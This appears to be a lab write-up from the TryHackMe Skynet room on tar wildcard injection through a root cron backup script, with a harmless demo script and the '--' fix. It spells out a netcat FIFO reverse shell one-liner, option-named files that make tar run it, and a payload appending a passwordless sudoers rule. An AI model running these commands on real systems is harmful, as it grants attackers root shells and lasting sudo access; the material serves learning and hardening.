Wildcards - Tar

Learnt while doing TryHackMe: Skynet

Read Wildcards - Chown first. There are two major techniques for exploiting wildcards with tar:

METHOD 1 => Reverse Shell through Cronjob/Script tampering using Wildcard injection

Our malicious user, kali, found a crontab entry that backed up a directory every minute through a script called "backup.sh". The script used a bare wildcard (*) to back up everything in the directory instead of naming the directory by an absolute path.

TAR => The Linux 'tar' command (tape archive) creates and extracts archive files. It is one of the core archiving tools on Linux: it can create compressed or uncompressed archives and also maintain and modify them.

--checkpoint=<number> => The '--checkpoint' option provides a flexible mechanism for executing arbitrary actions upon hitting checkpoints. Checkpoints are counted in records, not bytes: a record is the blocking factor times 512 bytes (512 bytes is one block, and the default blocking factor is 20, so a record is 10240 bytes). tar hits its first checkpoint after writing the first record. If no --checkpoint=<number> is given, the default interval is 10 records.

--checkpoint-action=<action> => Instructs tar to execute an action upon hitting a checkpoint (giving this option also implies --checkpoint). With --checkpoint=1 the action is executed at every record written, starting when the first record is flushed. Because tar pads the last record to full size, even a tiny archive produces one record, so the action fires at least once regardless of what the directory contains. Actions can be: echo, bell, dot, sleep, ttyout, exec (run an external command). Refer: https://www.gnu.org/software/tar/manual/html_node/Option-Summary.html#Option-Summary

Example: the following command runs the echo action at every checkpoint, i.e. after each record written. Note that the options come after the * operand: GNU tar accepts options anywhere on the command line, which is exactly what makes the injection below possible. (The archive is uncompressed despite the .tgz name, since there is no z flag.)

tar cf archive.tgz * --checkpoint=1 --checkpoint-action=echo

Now I will exploit this functionality to escalate privileges. I need a reverse shell payload in the directory being backed up (a netcat FIFO one-liner is used below; an msfvenom-generated payload would work the same way), plus two empty files whose names are the tar options. The shell expands * before tar sees its arguments, so tar receives those two filenames as options rather than as files to archive:

echo "mkfifo /tmp/wdozem; nc 127.0.0.1 8888 0</tmp/wdozem | /bin/sh >/tmp/wdozem 2>&1; rm /tmp/wdozem" > shell.sh
echo "" > '--checkpoint=1'
echo "" > '--checkpoint-action=exec=sh shell.sh'

The exec action runs 'sh shell.sh' relative to tar's working directory, so this only works if backup.sh changes into the backed-up directory before invoking tar; if it does not, reference shell.sh by its absolute path in the filename instead.

Start a listener, then wait a minute for the next cron run:

nc -nlvp 8888

ALSO => The above command executes shell.sh as soon as tar flushes its first record (10240 bytes with the default blocking factor; the interval counts records, not 512-byte blocks). If the --checkpoint=<number> file is missing, --checkpoint-action still implies --checkpoint with the default interval of 10 records, so the action should run once tar has written 10 records (102400 bytes with default blocking). To test that case I put a text file (text.txt) in the directory that is well over 10 records in size. Let's see what happens:

As you can see, we received a root shell: cron runs backup.sh as root, so the command spawned by the exec action runs as root too.

METHOD 2 => Privilege Escalation through tampering sudoers file with tar Wildcard Injection

The sudoers file is the file Linux and Unix administrators use to grant system rights to users; it lets the administrator control who may do what. When you run a command through "sudo", sudo checks your username (and groups) against the sudoers file. If you are not listed, you cannot run the command or program with elevated rights from that user.

In the previous scenario, we had tar using a wildcard in a script that was backing up a directory every minute.

Now for method two. Suppose you have access to the victim's machine as a non-root user: you can try to grant that user sudo rights by adding a rule for them to the sudoers file. The two --checkpoint files from method 1 stay in place; only shell.sh changes:

echo 'echo "kali ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > shell.sh

Use >> rather than a single >: a single > truncates /etc/sudoers and wipes every existing rule, which is noisy and may lock other users out of sudo. The redirection is performed by the shell that tar spawns, which runs as root, so the append succeeds even though kali cannot write /etc/sudoers directly.
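To see both methods' mechanics end to end without touching a real system, the script below (added here as an example; it is not part of the Skynet write-up) reproduces the injection in a throw-away directory and contrasts the backup.sh-style invocation with a hardened one. It assumes GNU tar (--checkpoint and --checkpoint-action are GNU extensions), mktemp and a POSIX sh. The injected command is a stand-in for the page's payloads: where shell.sh opens a reverse shell (method 1) or appends a sudoers rule (method 2), this one only creates a marker file, so it is safe to run as an unprivileged user.

```shell
#!/bin/sh
# Added example, not part of the Skynet write-up: reproduces the tar
# wildcard injection against a throw-away directory and contrasts the
# backup.sh-style invocation with a hardened one.
#
# Assumptions: GNU tar (--checkpoint / --checkpoint-action are GNU
# extensions), mktemp and a POSIX sh. The injected command is a stand-in
# for the page's payloads: where the write-up's shell.sh opens a reverse
# shell (method 1) or appends a sudoers rule (method 2), this one only
# creates a marker file, so it is safe to run as an unprivileged user.

# run_backup vulnerable|hardened
# Prints one "member: <name>" line per archived file, then
# "result: injected" if the planted checkpoint action ran, else "result: clean".
run_backup() {
    mode=$1
    work=$(mktemp -d)   # stands in for the directory the cron job backs up
    out=$(mktemp -d)    # stands in for the backup destination

    # Legitimate content of the directory (constructed sample data).
    printf '<html>hello</html>\n' > "$work/index.html"

    # Attacker-planted files. The cron job's bare '*' is expanded by the
    # shell into these names before tar runs, and GNU tar accepts options
    # after operands, so the two empty files are parsed as options.
    printf 'touch "%s/marker"\n' "$out" > "$work/shell.sh"
    : > "$work/--checkpoint=1"
    : > "$work/--checkpoint-action=exec=sh shell.sh"

    (
        cd "$work" || exit 1
        case $mode in
            vulnerable) tar cf "$out/backup.tar" * ;;     # as in backup.sh: bare glob
            hardened)   tar cf "$out/backup.tar" -- * ;;  # '--' ends option parsing
            *)          exit 2 ;;
        esac
    ) >/dev/null 2>&1 || true

    # With '--' the hostile names are archived as ordinary members instead
    # of being interpreted, so they show up in the listing and no action runs.
    tar -tf "$out/backup.tar" 2>/dev/null | sed 's/^/member: /'
    if [ -e "$out/marker" ]; then
        printf 'result: injected\n'
    else
        printf 'result: clean\n'
    fi

    rm -rf "$work" "$out"
}

# Demo: `sh wildcard_tar_demo.sh demo` (file name assumed) prints both runs.
if [ "${1-}" = demo ]; then
    for mode in vulnerable hardened; do
        printf '== %s ==\n' "$mode"
        run_backup "$mode"
    done
fi
```

The vulnerable run ends with "result: injected" and its listing lacks the two option-shaped names, because tar consumed them as options; the hardened run lists them as plain members and ends with "result: clean". Terminating the option list with -- is the minimal fix for this script; archiving the directory by name (tar cf backup.tar /var/www/html, or . after a cd) avoids handing tar a user-controlled glob at all. Note that -- only stops option injection in tar: other tools with wildcard-sensitive options, such as the chown --reference case on the Wildcards - Chown page, need their own handling.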

After waiting a minute, we check the sudo rules for our user:

sudo -l

As you can see, user kali has now been added to the sudoers file.

I launched a bash shell using sudo and, as you can see, no password prompt appears: user kali's privileges have now been escalated.
